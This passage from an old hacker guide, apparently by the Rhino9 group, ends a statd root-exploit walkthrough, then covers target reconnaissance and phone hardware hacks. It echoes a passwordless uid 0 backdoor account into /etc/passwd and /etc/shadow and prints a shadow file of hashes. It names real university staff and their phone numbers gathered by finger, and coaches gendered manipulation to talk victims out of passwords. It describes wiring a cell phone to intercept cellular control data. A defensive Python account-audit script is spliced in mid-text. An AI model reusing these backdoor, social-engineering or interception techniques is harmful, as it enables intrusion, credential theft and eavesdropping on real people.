      jjames:x:543:107:Joanne James:/home/jjames:/bin/tcsh
      nlock:x:543:107:nlock:/home/milo:/bin/tcsh
      xlock:x:0:1:xlock:/:/sbin/sh
      # echo b0bby:x:542:107:Rhino9 owns bitch:/usr/rhino9/:/bin/tcsh >> /etc/passwd
      # echo b0b:x:0:1:Rhino Root:/:/sbin/sh >> /etc/passwd
      *What this does is copy a low level user b0bby and a root user b0b. Remember that 2 >>’s make the stuff append to the passwd file. If it was one > then the whole thing would be overwritten and that is not good!*
      # cat /etc/shadow
      root:jLKY54WA3Teeo:10200::::::
      daemon:NP:6445::::::
      bin:NP:6445::::::
      sys:NP:6445::::::
      adm:NP:6445::::::
      kane:*LK*:::::::
      ecco:J/f78z945yJiQ:10199::::::
      iodatsys:k/F455ygv0lKo:10199::::::
      nealschu:Z1te54ytjJxtyY:10199::::::
      jjames:q1dMg453A0LYLE:10199::::::
      nlock:hEcxTL/4353p3FU:10216::::::
      xlock::10200::::::
      # echo b0bby::10199:::::: >> /etc/shadow
      # echo b0b::10200:::::: >> /etc/shadow
      *You must do the passwd and shadow echos as we have shown here if the system uses shadowed passwords. What we have just done is add the logins to the shadow password file*
      #
      *Now press control + ][ Then hit enter*
      DropStatd> quit
      *Type quit at the prompt. You are now back on your system. Now telnet back to www.victim.com*
      InterCore:/home/chameleon/ $ telnet www.victim.com
      Trying 205.133.121.210...
      Connected to deals.4deals.com.
      Escape character is '^]'.
       
      UNIX(r) System V Release 4.0 (hq)
      login: b0bby
      *Then it will ask you to set a password*
      VictimCorp$ su b0b
      #
      *What we did the was su into b0b, our root account. Now set a pass for b0b*
      # passwd b0b
      *Enter your pass*
      There you go, that's basically all it takes to get root on a system that is statd exploitable.
      Thank you to so1o for that mad phat exploit.
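Added example, not from the original text: a Python integrity check over /etc/passwd and /etc/shadow, written for the administrator of a box like www.victim.com. It uses the field layout from the Passwd Entry Break Down section and reports the traces the statd walk-through above leaves behind: a second uid 0 account, empty password fields in shadow, duplicate uids, and accounts absent from a baseline recorded when the box was built. Function names, the baseline and the sample files are constructed; the samples are trimmed copies of the victim listings above, after the two echo commands have run.

```python
"""passwd/shadow account audit (added example, constructed names and samples)."""
from collections import Counter

PASSWD_FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """List of dicts, one per well-formed passwd line (7 colon-separated fields)."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed lines are reported separately by audit_accounts
        entries.append(dict(zip(PASSWD_FIELDS, fields)))
    return entries


def parse_shadow(text):
    """{name: hashed-password field} from shadow lines (name:hash:lastchg:...)."""
    shadow = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0]:
            shadow[fields[0]] = fields[1]
    return shadow


def audit_accounts(passwd_text, shadow_text, baseline=None):
    """Sorted (user, reason) findings. baseline is the set of user names you
    recorded when the box was built; None skips that comparison."""
    findings = set()
    entries = parse_passwd(passwd_text)
    shadow = parse_shadow(shadow_text)
    uid_count = Counter(e["uid"] for e in entries)
    for e in entries:
        name = e["name"]
        if e["uid"] == "0" and name != "root":
            findings.add((name, "uid 0 account other than root"))
        if uid_count[e["uid"]] > 1:
            findings.add((name, "shares uid %s with another account" % e["uid"]))
        if e["password"] == "":
            findings.add((name, "empty password field in passwd"))
        if e["password"] == "x" and name not in shadow:
            findings.add((name, "no shadow entry"))
        if name in shadow and shadow[name] == "":
            findings.add((name, "empty password field in shadow (login without password)"))
        if baseline is not None and name not in baseline:
            findings.add((name, "not in baseline"))
    for line in passwd_text.splitlines():
        if line.strip() and not line.startswith("#") and line.count(":") != 6:
            findings.add((line.split(":")[0], "malformed passwd line"))
    known = {e["name"] for e in entries}
    for name in shadow:
        if name not in known:
            findings.add((name, "shadow entry without passwd entry"))
    return sorted(findings)


# Constructed samples: trimmed copies of the victim listings above, after the
# two echo commands have appended b0bby and b0b.
SAMPLE_PASSWD = """\
root:x:0:1:System Administrators:/:/sbin/sh
daemon:x:1:1:0000-Admin(0000):/:
jjames:x:543:107:Joanne James:/home/jjames:/bin/tcsh
nlock:x:543:107:nlock:/home/milo:/bin/tcsh
xlock:x:0:1:xlock:/:/sbin/sh
b0bby:x:542:107:added account:/usr/rhino9/:/bin/tcsh
b0b:x:0:1:Rhino Root:/:/sbin/sh
"""

SAMPLE_SHADOW = """\
root:jLKY54WA3Teeo:10200::::::
daemon:NP:6445::::::
jjames:q1dMg453A0LYLE:10199::::::
nlock:hEcxTL/4353p3FU:10216::::::
xlock::10200::::::
b0bby::10199::::::
b0b::10200::::::
"""

# Constructed baseline: the account list as it was before the intrusion.
BASELINE = {"root", "daemon", "jjames", "nlock", "xlock"}

if __name__ == "__main__":
    for user, reason in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW, BASELINE):
        print("%-8s %s" % (user, reason))
```

Run against the sample, the check flags b0b (uid 0, no password, not in the baseline), b0bby (no password, not in the baseline), the pre-existing xlock uid 0 account, and the jjames/nlock uid collision that was already in the victim's file; the same "empty password field in passwd" rule catches the pamcourt entry that the NFS section adds with two adjacent colons.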
      [16.0.9] System Probing
      The following are ways in which to gather information from a target host.
      For the rest of this topic we will refer to the target site, which will be ninja.com.
      These are in no order and are mostly unix commands used to gather information about a system.
      [16.1.0] Port scanning:
      You can find many port scanners on the internet. Search yahoo for portscan etc…
      What is a port scanner?

      What a port scanner does is check a remote host for open ports: ports listening for a connection request, remote services etc… The point of port scanning a system is to find out the services it has open. If we know what services a server has open we can then research and try to find flaws in those services. Also we can do certain DoS attacks if we know what ports are open. There are many port scanners. Some of the more advanced ones are for unix and cannot leave a trace on the remote server that you port scanned.
      [16.1.1] rusers and finger command:
      The commands' syntax is as follows:
      rusers [-a] [-h] [-i] [-l] [-u] [host ...]
      finger
        -v, --version          display version number
        -i, -l, -m, --info     display full user information
        -b, -s, --brief        opposite of --info; only display login records
        -f, --faces            display mugshot for user
        -P, --port #p          connect to finger daemon using port or service #p
        -h, --help             display this message
      Now you will find however that most servers have turned off finger services. Almost no WindowsNT servers have finger services and most unix servers have shut off finger services. The rusers command is to check for people logged in with rsh or rlogin (remote login).
      Side Note: There used to be an old bug in rlogin where you could type: rlogin -lroot victim.com and when the remote server parsed the data it would not read right and you would get root access; however this technique is old and rarely works anymore. By using finger and rusers we can get user names and that right there can lead to access of a system. Take nether.net for example. If you finger nether.net
      (finger @nether.net) you will get a list of user names. Now it's been my experience that on systems such as nether.net or places that give access to everyday users, 1 out of 70 or so users picks the same user name as their password. So it wouldn’t take much time to finger @nether.net then telnet to nether.net and try all the users you got from the finger. Also since you have gotten a list of usernames from finger nether.net you could then send e-mails to the users saying that you are a system official at nether.net and need to verify their password etc… You would be surprised what a little mind games can do for you. Also a good
      finger -l @victim.com can give you information such as the last time a user logged in, what type of shell their account is set to use, and where their home directory is. We can also watch for patterns in a user's access to a system. We could see whether they come on at night or during the day. To drop back to the thing of knowing about a person and their information to try and guess or talk them out of their password. Here is a finger on purdue. Look at the interesting information we can get.
      InterCore:/home/chameleon/ $finger @purdue.edu
      [purdue.edu]
      To use finger to search the Purdue Electronic Directory Service, specify your
      query as a person's given name. You can specify just a last name, a first
      name and a last name, or a first name, last name, and middle initial, by
      separating them with periods or commas. For example,
      finger smyth@purdue.edu
      finger smyth,veronica@purdue.edu
      finger veronica.j.smyth@purdue.edu
      Note: there was a lot more than this but I snipped it to make this shorter. Basically what it is saying is you have to put user@server.com instead of just server.com or in this case, purdue.edu.
      InterCore:/home/chameleon/ $
      So by looking at what it said I see it gives finger smyth@purdue.edu as an example. Now this is probably the same example that comes with this particular finger daemon but what the hell, let's try it.
      InterCore:/home/chameleon/ $finger smyth@purdue.edu
      [purdue.edu]
      Output of your query: smyth
      Name Dept/School Phone Status
      Email
      -------------------------------------------------------------------------------
      veronica j smyth computing center +1 777 99-99999 staff
      <no email address available>
      michael steel smyth engineering and tec student
      <no email address available>
      barbara j wilson smyth liberal arts and sc student
      <no email address available>
      william paul smyth freshman engineerin student
      <no email address available>
      erin margaret smyth science student
      <no email address available>
      cheryl lynn smyth liberal arts student
      <no email address available>
      -------------------------------------------------------------------------------
      For a more detailed response, finger "query_smyth@directory.purdue.edu".
      For help, finger "help@directory.purdue.edu".
      InterCore:/home/chameleon/ $
      Now this helps us in some ways and doesn’t in others. We can see through this finger full names of students and what their major is. So what, you ask? You know how much information you can get from someone’s legal full name? Chameleon will teach you how much later on in this document. So yes this finger was good because it got us personal information about a few account holders at purdue.edu, even an administrator's number, but what are the user names to these accounts? Well most universities issue their students' accounts in the same way. They usually make the username for a student's account the first letter of the first name and then the full last name. So if your name is Kevin Hall your user name would be khall@purdue.edu. Now we could then try and finger that user. So we would do the following:
      InterCore:/home/chameleon/ $finger khall@purdue.edu
      [purdue.edu]
      Output of your query: khall
      Name Dept/School Phone Status
      Email
      -----------------------------------------------------------------------------------
      Kevin G. Hall computing center +1 213 463-6694 student
      khall@purdue.edu
      -----------------------------------------------------------------------------------
      For a more detailed response, finger "query_khall@directory.purdue.edu".
      For help, finger "help@directory.purdue.edu".
      InterCore:/home/chameleon/ $
      We see that the finger daemon says for a more detailed response to do
      finger query_khall@directory.purdue.edu. So we type in the command:
      InterCore:/home/chameleon/ $finger query_khall@directory.purdue.edu
      [scribe.cc.purdue.edu]
      Output of your query: query_khall
      ----------------------------------------
      name: Kevin G. Hall
      campus: west lafayette
      title: sen syst anlyst/sen pace tech cons
      department: computing center
      building: potr
      office_phone: +1 765 49-68285
      email: khall@purdue.edu
      ----------------------------------------
      For help, finger "help@directory.purdue.edu".
      InterCore:/home/chameleon/ $

      Now this is interesting. We have a user name, khall, we have the users full name, Kevin G. Hall and we know his title and department. So from this information you will learn later you can get his home phone number and address. If we were to give the student a call at their house or dorm etc… It wouldn’t be too hard for anyone with a little bit of social engineering skills to talk this user out of his password.

      There is a basic example of how to get information about a logged on user.
      [16.1.2] Mental Hacking, once you know a username.

      Note: This is mostly going to work for systems that provide users with accounts and not company servers.

      If you (the cracker/hacker) are a male then you would want to try to finger and get a username of a woman. You could then do 2 things. You will probably get their full name but if not read my (chameleon's) later paper about getting people’s information. For simplicity's sake say you already have the user's phone number, which might sound hard to do but isn’t. So say you have their phone number and it’s a woman. Call the lady up. A true social engineer will know right away what kind of woman it is. One you can push over and mow down or one that has a strong head on her shoulders. If she answers and sounds lame then go for the approach of a stern voice saying it's imperative etc… that you verify her user name and password. If the lady seems to have a strong head on her shoulders then you would want to talk nicer and flirt a bit. If you are a woman (cracker/hacker) then you will want to find a male's account. Women let me tell you this. The best hackers and crackers out there are women. If you are a woman then you will want to try to get into a male’s account. Once you have a male account holder's phone number call him up. Women you got it easier, see you don’t need to know what type of guy it is. All guys are horny. So talk with your sexy voice. Flirt with them etc… It is easier for women to talk people out of passwords. If you are a guy (cracker/hacker) and are trying to get a guy's password then have a girlfriend of yours try to do it. Remember this most of all, KNOW the person you are calling. You could call them up and tell them you are from the local high school and are doing a survey and then ask them a bunch of questions to get to know what they like and then when you later call to get their password you use this information to get on their better side and win their trust. This is called mental hacking and it is not that hard at all. One thing that the hackers of today have lost is their social skills. Some systems don’t have software exploits.
      Sometimes you have to go the extra mile. Note: Don’t get me wrong and think I am some weirdo about the way I talked about men and women but, I do know people well.
      [17.0.0] Making a DDI from a Motorola Brick phone
      By Virtual of Cybrids CSE
      www.cybrids.org
       
      OK, here it is, i'm not gonna talk about it a whole lot, just tell you
      what i've done, and what i want to see done. As of this point I have
      found the Clock, Data, and the spot where you would feed your audio input
      from your scanner that has WBFM.
      First you will need to locate the chip that has the clock and data pins.
      This will be labeled SC3800xxFN, or something close to that, xx being some
      numbers. Having trouble already, then i'll tell ya another way, its the
      biggest PLCC (square) chip in the phone. Now look at the chip, there is a
      notch on the front of it which means pin 1. Now look at the opposite side
      of that dot, to the pins on the bottom, count over from the left, pins 8
      and 9 from the left side are the ones you want. I have included a picture
      of the inside of a brick phone. The red arrow points to the side of the
      chip that I am talking about. Pin 8 is the data and Pin 9 is the clock.
      Those are the pins that will be fed to your computer for decoding.
      The receiver chip is what you need to modify next. It's on the circuit board
      with the big white rectangle thing, and the big pieces of metal; it's the
      only square chip you can see. It's got a few numbers on it and I'll put 'em
      here to help you find it, 185, X94R01, something to that effect, but just
      look for the only PLCC chip visible. I have marked this chip with a blue
      circle. With the phone oriented like in the picture, cut the trace coming
      from the bottom pin on the right of the chip. Connect your scanner's OUTPUT
      to the other side of that trace (not the one connecting to the chip).
      Cut it in the center so you will have room to solder to either side
      of the wire trace. The pin coming off the chip is what the cellular phone
      is receiving, the other side of the wire trace that you cut is where it's
      being sent.
      That about sums up what you need to know, if you have any other non-bonehead
      questions, I'm in #cellular on EFnet most all the time and #Cybrids on
      Undernet.
      Now here is what I want to see happen, for all the smart guys out there.
      Scanners are cool, but why use it? The phone is capable of receiving the
      RECC without a scanner. I am working on making this happen right now, but
      with others' help, I'm sure this could get done a lot faster, and would
      benefit everyone greatly.
       
      Cable connections to the computer
      DDI        Parallel Port (pin)
      Clock      10
      Data       15
      Ground     18

      Special Note: The graphic that is referenced in this portion can be obtained at the rhino9 website or directly from Virtual. Find him in #cybrids on Undernet.
      (Beware of new technology coming out from companies such as Cellular One, technologies such as FPF Protection, which requires you to enter an access code to make outgoing calls on your cellphone.)
      [18.0.0] Pager Programmer
      By Virtual of Cybrids CSE

      In order to build a pager programmer, you are going to need a few things: a soldering iron, the pager you are going to program, and a few brain cells. You will also need the software that is used to program your specific pager, which can be found on my web page at the bottom of the text. The diagram I have included should be self-explanatory, but I will say a few things about it just in case. The only chip needed is the Max233, which will convert the serial port voltage down to TTL level so the pager can understand it. Normally a serial port communicates with +15 volts being a logic high and -15 being a logic low. The chip converts this down to TTL, which is 0 - 5 volts where 0 is low and 5 is high. The chip is shown inside the plastic hood that covers the connector. Make sure your hood is plastic and not metalized, as this is real metal coating and will short the pins. This side will plug into your serial port. The 4 pin connector shown will go to the pager. Where it says +5 volts is where you supply the chip with 5 volts; it's not a 5 volt output. A circuit like this could be used to generate the +5 volts using the very common 7805 voltage regulator.

                       _________
                      |         |
                      |  7805   |
                      |_________|
                       |   |   |
      Vin _____________|   |   |_____________ Vout
                           |
                         -----
                          ---  gnd
                           -

      Vin = Voltage in, 6-12 volt wall adaptor, + goes to Vin, - goes to gnd
      Vout = +5 volts out
      gnd = ground, could be thought of as minus
       
      You will also have to supply your pager with power, which is probably 1.5 volts. Then you will have to find the transmit and receive pins on your pager and hook it up to the programmer accordingly. The only way to do this is to open up your pager and look around for something that might look like a programming connector or pad with 3 or 4 wires; don't confuse this with the connector that connects the processor and receiver boards in Motorola Bravo pagers. I can't give exact instructions here because unfortunately I do not own every pager in the world. If they aren't hooked up correctly, when you run the pager programming software it will just give you an error but won't affect the pager, so just switch the wires around. Make sure you hooked the ground to the pager too, or else nothing will work. The gnd wire should be connected to the minus terminal on the pager's battery connector.

      The chip, hood, and connector can be bought at DigiKey. This is by far the simplest and easiest-to-build design I've seen on the net. Motorola's web page shows all of their pager designs, so you can figure out what type of pager you have and can then get the software for it.

      Programming Software: http://www.cybrids.org/virtual/
      Motorola: http://www.mot.com/MIMS/MSPG/cgi-bin/prodcat.cgi
      Special Note: The graphic that is referenced in this portion can be obtained at the rhino9 website or directly from Virtual. Find him in #cybrids on Undernet.
      [19.0.0] The End


Copyright and Fair Use Information: The contents of this web site are protected by international copyright laws and may not be reproduced in any form or manner whatsoever if for the purpose of resale or solicitation of a donation. The essays included here may be reproduced only if: 1) they are not altered in any way; 2) reproductions are accompanied by this copyright page; and 3) it is given freely and without charge.
Fair use: The fair use of copyrighted work, including such use by reproduction in copies or phonorecords or by any other means specified in the above sections, for purposes such as criticism, comment, news reporting, teaching (including multiple copies for classroom use), scholarship, or research, is not an infringement of copyright. In determining whether the use made of a work in any particular case is fair use, the factors to be considered include: (1) the purpose and character of the use, including whether the use is of a commercial nature or is for nonprofit educational purposes; (2) the nature of the copyrighted work; (3) the amount and substantiality of the portion used in relation to the copyrighted work as a whole; and (4) the effect of the use upon the potential market value of the copyrighted work.
